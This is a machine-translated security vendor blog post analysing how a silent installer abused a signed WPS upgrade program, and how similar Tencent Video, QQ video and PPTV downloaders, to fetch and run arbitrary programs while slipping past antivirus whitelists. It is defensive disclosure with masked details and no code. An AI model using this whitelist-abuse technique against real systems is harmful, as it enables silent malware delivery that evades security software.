Tinder Safety · 2016/04/22 18:45

0 x00 background

A “whitelist,” a set of trusted objects, corresponds to a “blacklist,” and is often used to implement “exclude” class logic. In the security field, “whitelist” is usually used to optimize the analysis logic of trusted objects or solve the false positives generated by the search, kill and interception logic.

In domestic security circles, however, there is talk of “white or black”, in which samples are “scanned” by very broad heuristic logic such as statistical algorithms, and the false positives generated by such heuristic algorithms are suppressed by high-coverage “whitelisted” clouds (commonly known as “clouds”). This logic is not hard to understand, since there are far more “white files” than “black files”, so “whitelisting” clearly “increases” detection rates “if false positives are ignored. This is not difficult to understand, why we often see on the network security software users reflect “why I just compiled the program was a certain security software reported poison? “Such a question.

In addition, some security software will use “whitelisting” to “optimize the user experience”, such as “whitelisting” program behavior does not analyze, block and so on.

However, “trust” is often accompanied by flaws that can be rooted in procedural logic or even human nature. Because of the vulnerabilities created by the “trust” mechanism, we often call them “trust vulnerabilities”. Virus authors often try to exploit “trust holes” in security software, finding ways to exploit programs on the “white list” of security software to achieve malicious behavior. We call this kind of technology “trust-exploitation”, or “white and black”. The author of the virus reported in the news some time ago bribed the personnel of a security software manufacturer to add his virus program to the “white list” of security software for this purpose.

Tinder’s software Installation Interception recently intercepted a silent installation package called “Lightspeed Desktop Search” (Figure 1, Figure 2), which attempted to silently promote the installation of multiple applications through “trust exploitation” techniques.

Figure 1. Silent installation package of “Speed desktop Search”

Figure 2. Tinder “Software installation interception” prompt

0 x01 analysis

This “light speed desktop search” silent installation package (hereafter referred to as “light speed desktop search”) will release a named qDW.exe file after running, through the view of the file information, found that the file has a legitimate golden hill digital signature. Through analysis, it is not difficult to find that the qDW.exe is actually the WPS upgrade program (Figure 3, Figure 4).

FIG. 3 File description information

Figure 4. A valid file signature

Next, Lightspeed Desktop Search uses the command-line parameters supported by the WPS upgrade to download and execute the backend promotion software. As shown in Figure 5 and 6:

Figure 5. “Lightspeed Desktop Search” uses the WPS upgrade for rogue promotion

Figure 6. “Lightspeed Desktop Search” uses the WPS upgrade for rogue promotion

Because this “WPS upgrade program” is through the command line parameters to obtain the download link, so that others can easily change the download address, and the program to download the link and download after the program did not verify security, resulting in the download can run any program. As a result of this 2011 signature of the WPS upgrade program has been each security software income “white list”, was “light speed desktop search” used to display “trust use” technology, brazenly rogue promotion.

0 x02 extension

Using Kingsoft’s digital signature, we found that the WPS upgrade was created in 2011. After the development of these years, can there still be such loopholes in regular software?

Through tinder security intelligence analysis system, we found that there are such vulnerabilities in software not only Jinshan, Tencent Video, QQ video, PPLive and other software have such vulnerabilities in the program design, virus authors can download and execute any program through the program components of the software. As shown in FIG. 7, 8 and 9:

FIG. 7 Command line of Tencent Video promotion program

FIG. 8 COMMAND line of QQ video promotion program

Figure 9. PPLive extension command line

Tencent Video will optionally promote some third-party software during installation (Figure 10), and the problem is the program St******cs.exe that downloads the installation package. The program does not verify the validity of the parameters, but simply replaces the download link with the parameter format and automatically completes the download and execution (Figure 11). The website shown in Figure 12 is a test server I set up. I uploaded a Microsoft calculator program on this server, then copied the St******cs.exe program to the root directory of drive C, added parameters and ran the program, and the calculator program was successfully downloaded and run.

FIG. 10 Tencent Video promotes third-party applications

FIG. 11 Tencent Video passedSt******cs.exeProgram download and run the promotion package

FIG. 12 TencentSt******cs.exeLeak testing

By analyzing St******cs.exe, we find that the program will look for the parameter “-b*** URL” after obtaining the command line parameter. If it finds the parameter, it will get the download link provided by the parameter, but it does not verify the validity of the download link, so it will be handed to the download function. As shown in Figure 13:

FIG. 13 TencentSt******cs.exeGet the download link

In the download function, we can see that in the download function, the program did not verify the validity of the link, and directly created a directory and the Internet to download. (Figure 14)

FIG. 14 TencentSt******cs.exeDownload and run the program

PPTV also silently promotes third-party software during installation. PPTV releases an L**** R.xe program to download the installation package at installation time, which carries a legitimate PPTV digital signature (as shown in Figure 15). Testing the program also failed to verify the security of the download link and the downloaded program. By modifying the command line parameters, it was found that the program could also download and run the program at any specified download link (figure 16).

FIG. 15 download program of PPTV

Figure 16. PPTV vulnerability test

After a simple analysis, we found that this program is just like Tencent’s download program, which is simply downloaded and executed after obtaining the download link in the parameters without any security verification (as shown in FIG. 17 and 18).

Figure 17, PPTVL****r.exeGet download link, splice save file path

Figure 18, PPTVL****r.exeDownload and execute any program

0 x03 review

Based on interception data collected by The Tinder Security Intelligence Analysis System, we found that many software have the design vulnerabilities mentioned in this article. Some programs have even been used by virus or rogue software authors, through software design loopholes, the use of security software “trust loopholes” to avoid the security software to kill and intercept, and then perform malicious or rogue behavior.

Here, tinder appeals:

1. Security software manufacturers should improve the accuracy of intercepting and killing technically, make reasonable use of “white list”, and avoid “trust vulnerability” logically and mechanically.
2. Software manufacturers should also improve the awareness of code security, and make effective judgment of the validity of the input data obtained by the program, so as to avoid the malicious use of the program’s functional logic into the hands of criminals.